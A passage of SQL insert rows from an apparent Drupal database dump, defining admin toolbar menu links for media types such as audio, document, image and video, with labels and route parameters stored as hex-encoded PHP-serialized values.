('admin', 221, 'admin_toolbar_tools.extra_links:entity.media.field_ui_fieldsaudio', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.audio', 'entity.media.field_ui_fields', 'media_type=audio', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22617564696f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 219, 220, 221, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 222, 'admin_toolbar_tools.extra_links:entity.entity_form_display.media.defaultaudio', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.audio', 'entity.entity_form_display.media.default', 'media_type=audio', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22617564696f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 219, 220, 222, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 223, 'admin_toolbar_tools.extra_links:entity.entity_view_display.media.default.audio', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.audio', 'entity.entity_view_display.media.default', 'media_type=audio', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22617564696f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 219, 220, 223, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 224, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.media.default.audio', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.audio', 'entity.media_type.entity_permissions_form', 'media_type=audio', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22617564696f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 219, 220, 224, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 225, 'admin_toolbar_tools.extra_links:entity.media_type.delete_form.audio', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.audio', 'entity.media_type.delete_form', 'media_type=audio', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22617564696f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 219, 220, 225, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 226, 'admin_toolbar_tools.extra_links:media.type_add', 'entity.media_type.collection', 'entity.media_type.add_form', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a22416464206d656469612074797065223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, -2, 0x613a303a7b7d, 0, 4, 6, 10, 219, 226, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 227, 'admin_toolbar_tools.extra_links:views_ui.media', 'entity.view.collection', 'entity.view.edit_form', 'view=media', 0x613a313a7b733a343a2276696577223b733a353a226d65646961223b7d, '', 0x733a353a224d65646961223b, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 10, 20, 227, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 228, 'media.settings', 'system.admin_config_media', 'media.settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d656469612073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32323a224d616e616765206d656469612073657474696e67732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'media', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 23, 24, 228, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 229, 'admin_toolbar_tools.extra_links:media.add.document', 'admin_toolbar_tools.extra_links:add_media', 'entity.media.add_form', 'media_type=document', 0x613a313a7b733a31303a226d656469615f74797065223b733a383a22646f63756d656e74223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31303a226d656469615f74797065223b733a393a22656e746974795f6964223b733a383a22646f63756d656e74223b7d, 0, 5, 6, 8, 216, 217, 229, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 230, 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.document', 'entity.media_type.collection', 'entity.media_type.edit_form', 'media_type=document', 0x613a313a7b733a31303a226d656469615f74797065223b733a383a22646f63756d656e74223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31303a226d656469615f74797065223b733a393a22656e746974795f6964223b733a383a22646f63756d656e74223b7d, 1, 4, 6, 10, 219, 230, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 231, 'admin_toolbar_tools.extra_links:entity.media.field_ui_fieldsdocument', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.document', 'entity.media.field_ui_fields', 'media_type=document', 0x613a313a7b733a31303a226d656469615f74797065223b733a383a22646f63756d656e74223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 219, 230, 231, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 232, 'admin_toolbar_tools.extra_links:entity.entity_form_display.media.defaultdocument', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.document', 'entity.entity_form_display.media.default', 'media_type=document', 0x613a313a7b733a31303a226d656469615f74797065223b733a383a22646f63756d656e74223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 219, 230, 232, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 233, 'admin_toolbar_tools.extra_links:entity.entity_view_display.media.default.document', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.document', 'entity.entity_view_display.media.default', 'media_type=document', 0x613a313a7b733a31303a226d656469615f74797065223b733a383a22646f63756d656e74223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 219, 230, 233, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 234, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.media.default.document', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.document', 'entity.media_type.entity_permissions_form', 'media_type=document', 0x613a313a7b733a31303a226d656469615f74797065223b733a383a22646f63756d656e74223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 219, 230, 234, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 235, 'admin_toolbar_tools.extra_links:entity.media_type.delete_form.document', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.document', 'entity.media_type.delete_form', 'media_type=document', 0x613a313a7b733a31303a226d656469615f74797065223b733a383a22646f63756d656e74223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 219, 230, 235, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 236, 'admin_toolbar_tools.extra_links:media.add.image', 'admin_toolbar_tools.extra_links:add_media', 'entity.media.add_form', 'media_type=image', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22696d616765223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31303a226d656469615f74797065223b733a393a22656e746974795f6964223b733a353a22696d616765223b7d, 0, 5, 6, 8, 216, 217, 236, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 237, 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.image', 'entity.media_type.collection', 'entity.media_type.edit_form', 'media_type=image', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22696d616765223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31303a226d656469615f74797065223b733a393a22656e746974795f6964223b733a353a22696d616765223b7d, 1, 4, 6, 10, 219, 237, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 238, 'admin_toolbar_tools.extra_links:entity.media.field_ui_fieldsimage', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.image', 'entity.media.field_ui_fields', 'media_type=image', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22696d616765223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 219, 237, 238, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 239, 'admin_toolbar_tools.extra_links:entity.entity_form_display.media.defaultimage', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.image', 'entity.entity_form_display.media.default', 'media_type=image', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22696d616765223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 219, 237, 239, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 240, 'admin_toolbar_tools.extra_links:entity.entity_view_display.media.default.image', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.image', 'entity.entity_view_display.media.default', 'media_type=image', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22696d616765223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 219, 237, 240, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 241, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.media.default.image', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.image', 'entity.media_type.entity_permissions_form', 'media_type=image', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22696d616765223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 219, 237, 241, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 242, 'admin_toolbar_tools.extra_links:entity.media_type.delete_form.image', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.image', 'entity.media_type.delete_form', 'media_type=image', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22696d616765223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 219, 237, 242, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 243, 'admin_toolbar_tools.extra_links:media.add.remote_video', 'admin_toolbar_tools.extra_links:add_media', 'entity.media.add_form', 'media_type=remote_video', 0x613a313a7b733a31303a226d656469615f74797065223b733a31323a2272656d6f74655f766964656f223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31303a226d656469615f74797065223b733a393a22656e746974795f6964223b733a31323a2272656d6f74655f766964656f223b7d, 0, 5, 6, 8, 216, 217, 243, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 244, 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.remote_video', 'entity.media_type.collection', 'entity.media_type.edit_form', 'media_type=remote_video', 0x613a313a7b733a31303a226d656469615f74797065223b733a31323a2272656d6f74655f766964656f223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31303a226d656469615f74797065223b733a393a22656e746974795f6964223b733a31323a2272656d6f74655f766964656f223b7d, 1, 4, 6, 10, 219, 244, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 245, 'admin_toolbar_tools.extra_links:entity.media.field_ui_fieldsremote_video', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.remote_video', 'entity.media.field_ui_fields', 'media_type=remote_video', 0x613a313a7b733a31303a226d656469615f74797065223b733a31323a2272656d6f74655f766964656f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 219, 244, 245, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 246, 'admin_toolbar_tools.extra_links:entity.entity_form_display.media.defaultremote_video', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.remote_video', 'entity.entity_form_display.media.default', 'media_type=remote_video', 0x613a313a7b733a31303a226d656469615f74797065223b733a31323a2272656d6f74655f766964656f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 219, 244, 246, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 247, 'admin_toolbar_tools.extra_links:entity.entity_view_display.media.default.remote_video', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.remote_video', 'entity.entity_view_display.media.default', 'media_type=remote_video', 0x613a313a7b733a31303a226d656469615f74797065223b733a31323a2272656d6f74655f766964656f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 219, 244, 247, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 248, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.media.default.remote_video', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.remote_video', 'entity.media_type.entity_permissions_form', 'media_type=remote_video', 0x613a313a7b733a31303a226d656469615f74797065223b733a31323a2272656d6f74655f766964656f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 219, 244, 248, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 249, 'admin_toolbar_tools.extra_links:entity.media_type.delete_form.remote_video', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.remote_video', 'entity.media_type.delete_form', 'media_type=remote_video', 0x613a313a7b733a31303a226d656469615f74797065223b733a31323a2272656d6f74655f766964656f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a2244656c657465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 5, 0x613a303a7b7d, 0, 5, 6, 10, 219, 244, 249, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 250, 'admin_toolbar_tools.extra_links:media.add.video', 'admin_toolbar_tools.extra_links:add_media', 'entity.media.add_form', 'media_type=video', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22766964656f223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31303a226d656469615f74797065223b733a393a22656e746974795f6964223b733a353a22766964656f223b7d, 0, 5, 6, 8, 216, 217, 250, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 251, 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.video', 'entity.media_type.collection', 'entity.media_type.edit_form', 'media_type=video', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22766964656f223b7d, '', 0x733a303a22223b, 0x733a303a22223b, 'Drupal\\admin_toolbar_tools\\Plugin\\Menu\\MenuLinkEntity', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 0, 0x613a323a7b733a31313a22656e746974795f74797065223b733a31303a226d656469615f74797065223b733a393a22656e746974795f6964223b733a353a22766964656f223b7d, 1, 4, 6, 10, 219, 251, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 252, 'admin_toolbar_tools.extra_links:entity.media.field_ui_fieldsvideo', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.video', 'entity.media.field_ui_fields', 'media_type=video', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22766964656f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224d616e616765206669656c6473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 1, 0x613a303a7b7d, 0, 5, 6, 10, 219, 251, 252, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 253, 'admin_toolbar_tools.extra_links:entity.entity_form_display.media.defaultvideo', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.video', 'entity.entity_form_display.media.default', 'media_type=video', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22766964656f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a224d616e61676520666f726d20646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 2, 0x613a303a7b7d, 0, 5, 6, 10, 219, 251, 253, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 254, 'admin_toolbar_tools.extra_links:entity.entity_view_display.media.default.video', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.video', 'entity.entity_view_display.media.default', 'media_type=video', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22766964656f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a224d616e61676520646973706c6179223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 219, 251, 254, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 255, 'admin_toolbar_tools.extra_links:entity.entity_permissions_form.media.default.video', 'admin_toolbar_tools.extra_links:entity.media_type.edit_form.video', 'entity.media_type.entity_permissions_form', 'media_type=video', 0x613a313a7b733a31303a226d656469615f74797065223b733a353a22766964656f223b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224d616e616765207065726d697373696f6e73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'admin_toolbar_tools', 1, 1, 0, 3, 0x613a303a7b7d, 0, 5, 6, 10, 219, 251, 255, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
